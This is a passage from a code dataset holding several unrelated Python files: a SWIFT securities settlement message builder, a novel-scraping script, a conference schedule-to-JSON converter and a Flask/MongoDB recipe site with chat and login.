_format_subsequenceb1_date_time_98A(self, date_time_values):\n \"\"\"returns formatted values of provided input\"\"\"\n date = date_time_values.get('date')\n qualifier = date_time_values.get('qualifier')\n date_format = '%Y%m%d'\n yyyymmdd_date = FSwiftWriterUtils.format_date(date, date_format)\n date_time = \":\" + str(qualifier) + '//' + str(yyyymmdd_date)\n return date_time\n\n def _setsubsequenceb1date_time_98A(self, date_time_values):\n \"\"\"sets the provided tag and value in python object\"\"\"\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.Date.append(date_time_values)\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.Date[-1].swiftTag = \"98A\"\n\n # ------------------ SubSequence B1 rate - 92A -----------------------\n\n def subsequenceb1_rate(self):\n \"\"\"returns a list containing the dictionary of values of Qualifier and rate\"\"\"\n rate_list = []\n rate_dict = {}\n rate_block = {}\n rate_block['SETTLEMENT_RATE_QUALIFIER'] = FSecuritySettlementOutUtils.get_rate_qualifier()\n rate_block['SETTLEMENT_RATE'] = FSecuritySettlementOutUtils.get_rate(self.acm_obj)\n rate_dict['Rate'] = self.subsequenceb1_rate_92A(rate_block)\n rate_list.append(rate_dict)\n return rate_list\n\n def _format_subsequenceb1_rate(self, rate_values):\n \"\"\"returns list of formatted values of provided input\"\"\"\n rate_list = []\n for each_val in rate_values:\n rate_dict = {}\n if 'Rate' in each_val:\n rate_dict['Rate'] = self._format_subsequenceb1_rate_92A(each_val['Rate'])\n rate_list.append(rate_dict)\n return rate_list\n\n def _validate_subsequenceb1_rate(self, rate_values):\n \"\"\"returns list of validated values\"\"\"\n err_msg = ''\n rate_list = []\n for each_val in rate_values:\n rate_dict = {}\n if 'Rate' in each_val:\n val = self._validate_subsequenceb1_rate_92A(each_val['Rate'])\n if val:\n rate_dict['Rate'] = val\n rate_list.append(rate_dict)\n return rate_list\n\n def _check_condition_set_subsequenceb1_rate(self):\n \"\"\"return True or False depending on the condition provided\"\"\"\n return False\n\n def _set_subsequenceb1_rate(self, rate_values):\n \"\"\"calls actual setter APIs depending on the provided input\"\"\"\n for each_val in rate_values:\n if 'Rate' in each_val:\n self._setsubsequenceb1rate_92A(each_val['Rate'])\n\n def subsequenceb1_rate_92A(self, sett_rate_dict):\n \"\"\"Returns a dictionary with values of Qualifier and rate\"\"\"\n rate_dict = {}\n rate = sett_rate_dict['SETTLEMENT_RATE']\n qualifier = sett_rate_dict['SETTLEMENT_RATE_QUALIFIER']\n rate_dict['rate'] = rate\n rate_dict['qualifier'] = qualifier\n return rate_dict\n\n def _format_subsequenceb1_rate_92A(self, rate_values):\n \"\"\"returns formatted values of provided input\"\"\"\n rate = rate_values.get('rate')\n rate = FSecuritySettlementOutUtils.represent_negative_amount(rate)\n qualifier = rate_values.get('qualifier')\n rate_value = \":\" + str(qualifier) + '//' + str(rate)\n return rate_value\n\n def _setsubsequenceb1rate_92A(self, rate_values):\n \"\"\"sets the provided tag and value in python object\"\"\"\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.Rate.append(rate_values)\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.Rate[-1].swiftTag = \"92A\"\n\n # ------------------ type of financial instrument - 12C -----------------------\n\n def type_of_financial_instrument(self):\n \"\"\"returns a list containing the dictionary of values of Qualifier and CFI Code or 
ISITC Code\"\"\"\n type_of_financial_instrument_list = []\n type_of_financial_instrument_dict = {}\n type_of_financial_instrument_block = {}\n type_of_financial_instrument_block['INSTRUMENT_TYPE_CFI_CODE'] = None\n type_of_financial_instrument_block['INSTRUMENT_TYPE_ISITC_CODE'] = None\n type_of_financial_instrument_block['INSTRUMENT_TYPE_OPTION'] = None\n\n type_of_financial_instrument_block['INSTRUMENT_TYPE_QUALIFIER'] = FSecuritySettlementOutUtils.get_instrument_type_qualifier()\n\n if self.cfi_code:\n type_of_financial_instrument_block['INSTRUMENT_TYPE_CFI_CODE'] = self.cfi_code\n type_of_financial_instrument_block['INSTRUMENT_TYPE_OPTION'] = 'C'\n if self.isitc_code:\n type_of_financial_instrument_block['INSTRUMENT_TYPE_ISITC_CODE'] = self.isitc_code\n type_of_financial_instrument_block['INSTRUMENT_TYPE_OPTION'] = 'A'\n\n if type_of_financial_instrument_block['INSTRUMENT_TYPE_OPTION'] == 'A':\n type_of_financial_instrument_dict['TypeOfInstrument'] = self.type_of_instrument_12A(type_of_financial_instrument_block)\n elif type_of_financial_instrument_block['INSTRUMENT_TYPE_OPTION'] == 'C':\n type_of_financial_instrument_dict['TypeOfInstrument'] = self.type_of_instrument_12C(type_of_financial_instrument_block)\n\n type_of_financial_instrument_list.append(type_of_financial_instrument_dict)\n return type_of_financial_instrument_list\n\n def _format_type_of_financial_instrument(self, fin_ins_values):\n \"\"\"returns list of formatted values of provided input\"\"\"\n type_of_financial_instrument_list = []\n for each_val in fin_ins_values:\n type_of_financial_instrument_dict = {}\n type_of_instrument = each_val.get('TypeOfInstrument')\n if type_of_instrument:\n option = type_of_instrument.get('option')\n if option in ['A', 'C']:\n if option == 'A':\n type_of_financial_instrument_dict['TypeOfInstrument'] = self._format_type_of_instrument_12A(type_of_instrument)\n else:\n type_of_financial_instrument_dict['TypeOfInstrument'] = self._format_type_of_instrument_12C(type_of_instrument)\n type_of_financial_instrument_dict['option'] = option\n type_of_financial_instrument_list.append(type_of_financial_instrument_dict)\n return type_of_financial_instrument_list\n\n def _validate_type_of_financial_instrument(self, fin_ins_values):\n \"\"\"returns list of validated values\"\"\"\n err_msg = ''\n type_of_financial_instrument_list = []\n for each_val in fin_ins_values:\n type_of_financial_instrument_dict = {}\n type_of_instrument = each_val.get('TypeOfInstrument')\n if type_of_instrument:\n option = each_val.get('option')\n if option in ['A', 'C']:\n if option == 'A':\n val = self._validate_type_of_instrument_12A(type_of_instrument)\n else:\n val = self._validate_type_of_instrument_12C(type_of_instrument)\n type_of_financial_instrument_dict['TypeOfInstrument'] = val\n type_of_financial_instrument_dict['option'] = option\n type_of_financial_instrument_list.append(type_of_financial_instrument_dict)\n return type_of_financial_instrument_list\n\n def _check_condition_set_type_of_financial_instrument(self):\n \"\"\"return True or False depending on the condition provided\"\"\"\n return False\n\n def _set_type_of_financial_instrument(self, fin_ins_values):\n \"\"\"calls actual setter APIs depending on the provided input\"\"\"\n for each_val in fin_ins_values:\n type_of_instrument = each_val.get('TypeOfInstrument')\n if type_of_instrument:\n option = each_val.get('option')\n if option in ['A', 'C']:\n if option == 'A':\n self._settype_of_instrument_12A(type_of_instrument)\n else:\n 
self._settype_of_instrument_12C(type_of_instrument)\n\n def type_of_instrument_12A(self, instrument_type_dict):\n \"\"\"Returns a dictionary with values of Qualifier and ISITC Code\"\"\"\n type_of_financial_instrument_dict = {}\n instrument_type_code = instrument_type_dict['INSTRUMENT_TYPE_ISITC_CODE']\n qualifier = instrument_type_dict['INSTRUMENT_TYPE_QUALIFIER']\n type_of_financial_instrument_dict['instrument_type_code'] = instrument_type_code\n type_of_financial_instrument_dict['qualifier'] = qualifier\n type_of_financial_instrument_dict['option'] = 'A'\n return type_of_financial_instrument_dict\n\n def _format_type_of_instrument_12A(self, fin_ins_values):\n \"\"\"returns formatted values of provided input\"\"\"\n instrument_type_code = fin_ins_values.get('instrument_type_code')\n qualifier = fin_ins_values.get('qualifier')\n type_of_instrument = \":\" + str(qualifier) + '/ISIT/' + str(instrument_type_code)\n return type_of_instrument\n\n def _settype_of_instrument_12A(self, fin_ins_values):\n \"\"\"sets the provided tag and value in python object\"\"\"\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.TypeOfFinancialInstrument_A.append(fin_ins_values)\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.TypeOfFinancialInstrument_A[-1].swiftTag = \"12A\"\n\n def type_of_instrument_12C(self, instrument_type_dict):\n \"\"\"Returns a dictionary with values of Qualifier and CFI Code\"\"\"\n type_of_instrument_dict = {}\n instrument_type_code = instrument_type_dict['INSTRUMENT_TYPE_CFI_CODE']\n qualifier = instrument_type_dict['INSTRUMENT_TYPE_QUALIFIER']\n type_of_instrument_dict['instrument_type_code'] = instrument_type_code\n type_of_instrument_dict['qualifier'] = qualifier\n type_of_instrument_dict['option'] = 'C'\n return type_of_instrument_dict\n\n def _format_type_of_instrument_12C(self, fin_ins_values):\n \"\"\"returns formatted values of provided input\"\"\"\n instrument_type_code = fin_ins_values.get('instrument_type_code')\n qualifier = fin_ins_values.get('qualifier')\n type_of_instrument = \":\" + str(qualifier) + '//' + str(instrument_type_code)\n return type_of_instrument\n\n def _settype_of_instrument_12C(self, fin_ins_values):\n \"\"\"sets the provided tag and value in python object\"\"\"\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.TypeOfFinancialInstrument_C.append(fin_ins_values)\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.TypeOfFinancialInstrument_C[-1].swiftTag = \"12C\"\n\n","sub_path":"Extensions/FSwiftSecuritySettlement/FPythonCode/FSecuritySettlementOutBase.py","file_name":"FSecuritySettlementOutBase.py","file_ext":"py","file_size_in_byte":45303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"403578682","text":"import requests # requests是python的一个轻量级爬虫框架\nfrom bs4 import BeautifulSoup as bs # BeautifulSoup这个名字太长了,简写成bs\n\n# 打开网页函数\ndef get_response(url):\n headers = {\n 'User-Agent': \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36\"}\n response = requests.get(url, headers)\n #response.encoding = 'utf-8'\n response.encoding = 'gbk'\n return response\n\n# 获取网页中a标签中的文本和链接信息\n# 参数说明(顺序对应下面的参数位置):\n# 根路径(需要和相对路径进行拼接),需要解析的url、解析式、链接的键名、文本信息的键名、传入的字典\ndef get_text_and_link(base_url,url,req,link_name,text_name,items):\n response = get_response(url)\n soup = bs(response.text, 'lxml')\n #print(len(soup.select(req)))\n 
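get_text_and_link in the scraper below builds absolute links by concatenating base_url with item['href'], which only works while every href is root-relative. urllib.parse.urljoin handles relative, root-relative and absolute hrefs uniformly; a standalone sketch with illustrative URLs:

from urllib.parse import urljoin

base = 'https://www.gulongwang.com/duo/'
assert urljoin(base, '/lu/1.html') == 'https://www.gulongwang.com/lu/1.html'
assert urljoin(base, '2.html') == 'https://www.gulongwang.com/duo/2.html'
assert urljoin(base, 'https://other.site/x') == 'https://other.site/x'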
for item in soup.select(req):\n        # The extracted links are relative paths, so join them with the base URL to form full links\n        items[link_name] = base_url + item['href']\n        items[text_name] = item.text\n        yield items\n\n# Fetch chapter content\ndef get_content(url,req_start,req_end,items):\n    response = get_response(url)\n\n    # Parse the fetched text with the html parser\n    soup = bs(response.text, 'html.parser')\n    # Locate the chapter body via the given selectors; these are best chosen by inspecting the page\n    # Two selectors are needed because extracting a large block needs start and end markers\n\n    content = soup.find(req_start,class_=req_end).strings\n    # Pass the book name, chapter title and body text to writeFile for saving\n    writeFile(items['book_name'],items['chapter_name'],content)\n\n# Save to file\ndef writeFile(book_name,title,content):\n    # Append .txt to the book name so the output is a plain text file\n    # Mode 'a' appends ('w' would overwrite); the encoding is utf-8\n    with open(book_name + '.txt','a',encoding='utf-8')as txt_file:\n        # Setting the file encoding avoids mojibake when writing\n        # Start a new line before each chapter title\n        txt_file.write('\\n'+title+'\\n')\n        for line in content:\n            # content is a generator, so write it to the file item by item\n            txt_file.write(line)\n    print(f'{ title } written to { book_name }.txt')\n\n# Main entry point\ndef main():\n    # Root URL of the site\n    base_url = 'https://www.gulongwang.com'\n    # Empty dict to collect results\n    items = {}\n    # Get the list of books\n    # First pass: scrape book titles and book links from the home page\n    # Arguments: base URL, page URL, CSS selector, key for the book link, key for the book title, dict\n    book_links = get_text_and_link(base_url,base_url,'p a','book_link','book_name',items)\n    # Walk the list, taking each book's title and link in turn\n    for item in book_links:\n        # Second pass: scrape the chapter titles and body links of this book\n        # Arguments: base URL, book link, chapter-list selector, key for the chapter link, key for the chapter title, dict\n        chapter = get_text_and_link(base_url,item['book_link'],'#right li a','chapter_link','chapter_name',items)\n        for item in chapter:\n            # Fetch and save each chapter's content\n            get_content(item['chapter_link'],'div','nr_con',items)\n\n    # When the .py file is run directly, the code under if __name__ == \"__main__\": executes\n    # When the file is imported as a module, that code does not run\nif __name__ == \"__main__\":\n    main()\n","sub_path":"request_spider/requests_4.py","file_name":"requests_4.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"472912702","text":"import sys, json, csv, re, time\n\npapers = {}\nsessions = {}\nschedule = []\n\ndt_format='%m/%d/%Y'\n\ndef construct_id(s):\n    return re.sub(r'\\W+', '_', s)\n\ndef get_start_time(s_time):\n    s = s_time.split('-')[0].strip()\n    return int(re.match(r'\\d+', s).group())\n\ndef get_date_time(s_date, dt_format='%m/%d/%Y'):\n    if s_date == \"7/12/2016\":\n        return time.strptime('07/12/2016', dt_format)\n    if s_date == '7/13/2016':\n        return time.strptime('07/13/2016', dt_format)\n    if s_date == '7/14/2016':\n        return time.strptime('07/14/2016', dt_format) \n    if s_date == \"7/15/2016\":\n        return time.strptime('07/15/2016', dt_format) \n    #time_struct = time.strptime(s_date, dt_format)\n    #return time_struct\n\ndef get_day(time_struct):\n    return time.strftime(\"%A\", time_struct)\n\ndef get_date(time_struct):\n    return time.strftime(\"%m/%d/%Y\", time_struct)\n\ndef get_class(s_time):\n    v = get_start_time(s_time)\n    if(v < 10 and v >= 7):\n        return 'morning1'\n    elif(v >= 8 and v < 12):\n        return 'morning2'\n    elif(v >= 12 and v < 15):\n        return 'afternoon1'\n    elif(v >= 15 and v < 18):\n        return 'afternoon2'\n    else:\n        return 'evening'\n\ndef prepare_schedule(t_schedule):\n    # sort schedule data\n    for s_date in t_schedule: \n        t_schedule[s_date] = sorted(\n            t_schedule[s_date].items(), key = lambda x: get_start_time(x[0]))\n\n    t_schedule = sorted(t_schedule.items(), key=lambda x: time.mktime(get_date_time(x[0], dt_format=dt_format)))\n    for day_schedule in t_schedule:\n        slots = []\n        s_date = day_schedule[0]\n        all_slots = day_schedule[1]\n        for slot_info in all_slots:\n            slot_time = slot_info[0]\n            slot_sessions = 
slot_info[1]['sessions']\n slots.append({\n 'time': slot_time,\n 'sessions': slot_sessions,\n 'slot_class': get_class(slot_time),\n 'slot_id': construct_id(s_date + slot_time)\n })\n schedule.append({'date': get_date(get_date_time(s_date, dt_format=dt_format)), 'slots': slots, 'day': get_day(get_date_time(s_date, dt_format=dt_format))})\n\ndef prepare_data(data_file1):\n f1 = open(data_file1, 'rU')\n reader1 = csv.reader(f1)\n \n p_id = 1\n \n reader1.next()\n \n t_schedule = {}\n for row in reader1:\n paper_id = unicode(row[0], \"ISO-8859-1\")\n paper_title = unicode(row[2].decode('utf-8'))\n paper_authors = unicode(row[3].decode('utf-8'))\n keywords = unicode(row[4].decode('utf-8')).strip('\"')\n session = unicode(row[5].decode('utf-8'))\n session_chair = unicode(row[6].decode('utf-8'))\n s_date = unicode(row[7], \"ISO-8859-1\")\n s_time = unicode(row[8], \"ISO-8859-1\")\n room = unicode(row[9], \"ISO-8859-1\")\n paper_abstract = unicode(row[10], \"ISO-8859-1\")\n \n if paper_abstract.strip() == '-':\n paper_abstract = ''\n \n if paper_title.strip() == '-' or paper_title.strip() == '':\n paper_title = session\n \n if session_chair.strip() != '-' and session_chair.strip() != '':\n session = session + ' - Chair: ' + session_chair\n \n type = unicode(row[1], \"ISO-8859-1\")\n if type == \"Main Track\" or type == \"AI&Web Track\":\n type = 'paper'\n elif 'posters' in session.lower():\n type = 'poster'\n elif 'demos' in session.lower():\n type = 'demo'\n else:\n type = 'talk'\n\n # prepare papers data\n papers[paper_id] = {\n 'title': paper_title,\n 'type': type,\n }\n \n if keywords.strip() != '-' and keywords.strip() != '':\n papers[paper_id]['keywords'] = keywords\n \n papers[paper_id]['abstract'] = paper_abstract\n \n \n \n paper_authors = re.sub(' and ', ', ', paper_authors)\n \n \n if paper_authors.strip() != '-' and paper_authors.strip() != '':\n papers[paper_id]['authors'] = [{'name': name.strip()} for name in paper_authors.split(',') if name.strip() != '']\n else:\n if session_chair != '-':\n papers[paper_id]['authors'] = [session_chair]\n papers[paper_id]['authors'] = []\n \n \n # prepare sessions data\n s_id = construct_id(session)\n if(s_id in sessions):\n sessions[s_id]['submissions'].append(paper_id)\n else:\n sessions[s_id] = {\n 'submissions': [paper_id], 's_title': session, 'room': room, 'time': s_time, 'date': s_date}\n\n p_id += 1\n\n # prepare schedule data\n for session in sessions:\n s_info = sessions[session]\n s_date = s_info['date']\n s_time = s_info['time']\n s_data = {'session': session, 'room': s_info['room']}\n if s_date in t_schedule:\n if s_time in t_schedule[s_date]:\n t_schedule[s_date][s_time]['sessions'].append(s_data)\n else:\n t_schedule[s_date][s_time] = {'time': s_time, 'sessions':[s_data] }\n else:\n t_schedule[s_date] = {s_time: {'time': s_time, 'sessions':[s_data]}}\n\n prepare_schedule(t_schedule)\n\n\ndef main():\n conf = sys.argv[2]\n data_file1 = sys.argv[1]\n prepare_data(data_file1)\n # write files\n p = open('data/' + conf + '/papers.json','w')\n p.write(json.dumps(papers, indent=2, sort_keys=True))\n p = open('server/static/conf/' + conf + '/data/papers.json','w')\n p.write('entities='+json.dumps(papers, indent=2, sort_keys=True))\n p = open('server/static/conf/' + conf + '/data/sessions.json','w')\n p.write('sessions='+json.dumps(sessions, indent=2, sort_keys=True))\n p = open('server/static/conf/' + conf +'/data/schedule.json','w')\n p.write('schedule='+json.dumps(schedule, indent=2, sort_keys=True))\n \n\nif __name__ == \"__main__\":\n 
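prepare_schedule above orders day keys by converting each date string to a struct_time and then to an epoch value with time.mktime. The same idea in standalone form, without the hardcoded date branches of get_date_time (the sample dates below are illustrative):

import time

dates = ['7/14/2016', '7/12/2016', '7/13/2016']
# strptime gives a struct_time; mktime turns it into a sortable epoch float.
ordered = sorted(dates, key=lambda d: time.mktime(time.strptime(d, '%m/%d/%Y')))
assert ordered == ['7/12/2016', '7/13/2016', '7/14/2016']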
main()\n","sub_path":"scripts/ijcai2016/prepare_json.py","file_name":"prepare_json.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"526462594","text":"import os\nimport json\nimport pymysql\nimport pymongo\nfrom datetime import datetime\nfrom flask import Flask, render_template, request, flash, redirect, session, url_for, abort\nfrom flask_pymongo import PyMongo\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nimport json\nfrom bson import json_util\nfrom bson.json_util import dumps\nimport re\nimport bcrypt\n\n\napp = Flask(__name__)\napp.secret_key = os.getenv(\"SECRET\", \"recipechat\")\n\n\n# Connection with MongoDB\napp.config[\"MONGO_DBNAME\"] = \"SimaRecipes\"\napp.config[\"MONGO_URI\"] = os.getenv(\"MONGO_URI\", \"mongodb://localhost\")\n\n\n# Variable to connected MongoDB database\nrecipe = PyMongo(app)\n\n\ndef mongo_connect(url):\n \"\"\"MongoDB connection\"\"\"\n try:\n conn = pymongo.MongoClient(url)\n #print(\"Mongo is Connected!\")\n return conn\n except pymongo.errors.ConnectionFailure as e:\n print(\"Could not connect to MongoDB: %s\") % e\n\n# Empty array to store messages\nmessages = []\n\n\n# for CHAT messages (chat.html)\ndef add_messages(username, message):\n \"\"\"Add messages to the messages list\"\"\"\n now = datetime.now().strftime(\"%H:%M:%S\")\n #messages_dict = {\"timestamp\": now, \"from\": username, \"message\": message}\n messages.append({\"timestamp\": now, \"from\": username, \"message\": message})\n \n\n# dashboard (index.html)\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", \n recipe_chicken = recipe.db.recipes.find(), # Variable to count Chicken recipes in database\n recipe_veg = recipe.db.recipes.find(), # Variable to count Vegetable recipes in database\n recipe_lamb = recipe.db.recipes.find(), # Variable to count Lamb recipes in database\n recipe_seafood = recipe.db.recipes.find(), # Variable to count Sea Food recipes in database\n recipe_beef = recipe.db.recipes.find(), # Variable to count Beef recipes in database\n recipe_healthy = recipe.db.recipes.find(), # Variable to count Healthy recipes in database\n recipe_vegan = recipe.db.recipes.find(), # Variable to count Vegan recipes in database\n recipe_pork = recipe.db.recipes.find(), # Variable to count Pork recipes in database\n recipe_25 = recipe.db.recipes.find(), # Variable to count recipes which can be ready under 30 mins in database\n recipe_35 = recipe.db.recipes.find(), # Variable to count recipes which takes over 30 mins to ready in database\n recipe_amc = recipe.db.recipes.find(), # Variable to count American Cuisine recipes in database\n recipe_auc = recipe.db.recipes.find(), # Variable to count Australian Cuisine recipes in database\n recipe_cdc = recipe.db.recipes.find(), # Variable to count Canadian Cuisine recipes in database\n recipe_cnc = recipe.db.recipes.find(), # Variable to count Chinese Cuisine recipes in database\n recipe_euc = recipe.db.recipes.find(), # Variable to count European Cuisine recipes in database\n recipe_fec = recipe.db.recipes.find(), # Variable to count Far Eastern Cuisine recipes in database\n recipe_mdc = recipe.db.recipes.find(), # Variable to count Meditarrenean Cuisine recipes in database\n recipe_mec = recipe.db.recipes.find(), # Variable to count Middle Eastern Cuisine recipes in database\n recipe_nac = recipe.db.recipes.find(), # Variable to count North African Cuisine recipes in database\n recipe_safc = 
recipe.db.recipes.find(), # Variable to count South African Cuisine recipes in database\n recipe_samc = recipe.db.recipes.find(), # Variable to count South American Cuisine recipes in database\n recipe_sasc = recipe.db.recipes.find()) # Variable to count South Asian Cuisine recipes in database\n \n\n@app.route(\"/SimaRecipes/recipes\")\ndef simasrecipe_project():\n # PyMongo exposes no top-level find(); query the recipes collection via .db\n projects = recipe.db.recipes.find()\n json_projects = []\n for project in projects:\n json_projects.append(project)\n json_projects = json.dumps(json_projects, default=json_util.default)\n \n return render_template(\"index.html\", json_projects=json_projects)\n \n\n# Recipes page (recipes.html) \n@app.route(\"/recipes\")\ndef recipes():\n \n return render_template(\"recipes.html\", \n page_title=\"Recipes\", \n recipes_veg = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Vegetable Recipes in database\n recipes_chick = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Chicken Recipes in database\n recipes_lamb = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Lamb Recipes in database\n recipes_seafood = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Sea Food Recipes in database\n recipes_beef = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Beef Recipes in database\n recipes_healthy = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Healthy Recipes in database\n recipes_vegan = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Vegan Recipes in database\n recipes_pork = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Pork Recipes in database\n recipes_amc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all American Cuisine Recipes in database\n recipes_auc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Australian Cuisine Recipes in database\n recipes_cdc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Canadian Cuisine Recipes in database\n recipes_cnc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Chinese Cuisine Recipes in database\n recipes_euc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all European Cuisine Recipes in database\n recipes_fec = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Far Eastern Cuisine Recipes in database\n recipes_mdc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Mediterranean Cuisine Recipes in database\n recipes_mec = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Middle Eastern Cuisine Recipes in database\n recipes_nac = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all North African Cuisine Recipes in database\n recipes_safc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all South African Cuisine Recipes in database\n recipes_samc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all South American Cuisine Recipes in database\n recipes_sasc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all South Asian Cuisine Recipes in database\n check_veg = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Vegetable Recipes in database\n check_chick = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Chicken Recipes in database\n check_lamb = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Lamb Recipes in database\n 
check_seafood = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Sea Food Recipes in database\n check_beef = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Beef Recipes in database\n check_healthy = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Healthy Recipes in database\n check_vegan = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Vegan Recipes in database\n check_pork = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Pork Recipes in database\n check_amc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all American Cuisine Recipes in database\n check_auc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Australian Cuisine Recipes in database\n check_cdc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Canadian Cuisine Recipes in database\n check_cnc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Chinese Cuisine Recipes in database\n check_euc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all European Cuisine Recipes in database\n check_fec = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Far Eastern Cuisine Recipes in database\n check_mdc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Mediterranean Cuisine Recipes in database\n check_mec = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Middle Eastern Cuisine Recipes in database\n check_nac = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all North African Cuisine Recipes in database\n check_safc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all South African Cuisine Recipes in database\n check_samc = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all South American Cuisine Recipes in database\n check_sasc = recipe.db.recipes.find().sort('recipe_name')) # Variable to list all South Asian Cuisine Recipes in database\n\n\n# Contact Us page (contact.html)\n@app.route(\"/contact\", methods=['POST', 'GET'])\ndef contact():\n if request.method == 'POST':\n \n # show a confirmation message for the submitted form\n flash(\"Thanks {}, we have received your message!\".format(\n request.form[\"name\"]\n ))\n #print(request.form[\"name\"])\n return render_template(\"contact.html\", page_title=\"Contact\")\n\n\n# chat page (chat.html)\n@app.route(\"/chat\", methods = [\"GET\", \"POST\"])\ndef chat():\n if request.method == \"POST\":\n \n # store the submitted username in the session\n session[\"username\"] = request.form[\"chatname\"]\n \n if \"username\" in session:\n #return redirect (session[\"username\"])\n # redirect to chat page\n return redirect (url_for(\"user\", username = session[\"username\"]))\n \n return render_template(\"chat.html\")\n\n\n# Username input (chat.html) \n@app.route(\"/chat/<username>\", methods=[\"GET\", \"POST\"])\ndef user(username):\n \n # Display chat Messages\n if request.method == \"POST\":\n username = session[\"username\"] # Add username into variable\n message = request.form[\"chatmessage\"] # store message(s) into variable\n add_messages(username, message) # store the username and message\n #return redirect(session[\"username\"])\n return redirect (url_for(\"user\", username = session[\"username\"]))\n \n return render_template(\"chat.html\", username = username, chat_messages = messages)\n\n\n@app.route('/newuser')\ndef newuser():\n return render_template('newuser.html')\n\n\n# Intermediate 
page between Login and admin\n@app.route('/loginuser')\ndef loginuser():\n if not session.get('logged_in'): # check whether someone is logged in or not\n return render_template('login.html') # redirect to login page\n else:\n return redirect(url_for('admin')) # redirect to admin page\n\n\n# Login page (login.html)\n@app.route('/login', methods=['POST'])\ndef login():\n users = recipe.db.users\n login_user = users.find_one({'name' : request.form['username']})\n \n if login_user:\n # only mark the session as logged in when the password hash matches\n if bcrypt.hashpw(request.form['password'].encode('utf-8'), login_user['password'].encode('utf-8')) == login_user['password'].encode('utf-8'):\n session['username'] = request.form['username']\n session['logged_in'] = True\n return redirect(url_for('admin'))\n return 'Invalid username/password combination'\n\n\n# Logout route (Logout button on top of the Admin page)\n@app.route(\"/logout\")\ndef logout():\n session['logged_in'] = False # deactivate the session and log the user out\n return redirect(url_for('loginuser')) # redirect to intermediate page/route\n\n\n# Admin page (admin.html)\n@app.route(\"/admin\")\ndef admin():\n \n if 'username' in session:\n return render_template(\"admin.html\", page_title =\"Admin\",\n categories = recipe.db.categories.find(), # Variable to list all Categories in the Database for combo box for adding new recipes \n recipes = recipe.db.recipes.find().sort('recipe_name'), # Variable to list all Recipes in the Database for Admin page\n category = recipe.db.categories.find().sort('category_name'), # Variable to list all Categories in the Database for EDIT or DELETE on Admin page\n images = recipe.db.images.find().sort('recipe_image'), # Variable to list all Images in the Database for combo box for adding new recipes \n cuisines = recipe.db.cuisines.find().sort('cuisine_name'), # Variable to list all Cuisines in the Database for combo box for adding new recipes \n cuisines_list = recipe.db.cuisines.find().sort('cuisine_name'), # Variable to list all Cuisines in the Database for EDIT or DELETE on Admin page\n username = session[\"username\"])\n \n return render_template('login.html')\n \n \n# Insert user to database (admin.html)\n@app.route(\"/insert_user\", methods=[\"POST\",\"GET\"])\ndef insert_user():\n if request.method == 'POST':\n users = recipe.db.users\n existing_user = users.find_one({'name' : request.form['username']})\n \n if existing_user is None:\n hashpass = bcrypt.hashpw(request.form['password'].encode('utf-8'), bcrypt.gensalt())\n users.insert_one({'name' : request.form['username'], 'email' : request.form['useremail'], 'password' : hashpass})\n session['username'] = request.form['username']\n return redirect(url_for(\"admin\"))\n \n return 'Username Already Exists'\n \n return render_template('newuser.html')\n\n\n# Insert recipe to Database (admin.html)\n@app.route(\"/insert_recipe\", methods=[\"POST\"])\ndef insert_recipe():\n addrecipes = recipe.db.recipes\n addrecipes.insert_one(request.form.to_dict())\n return 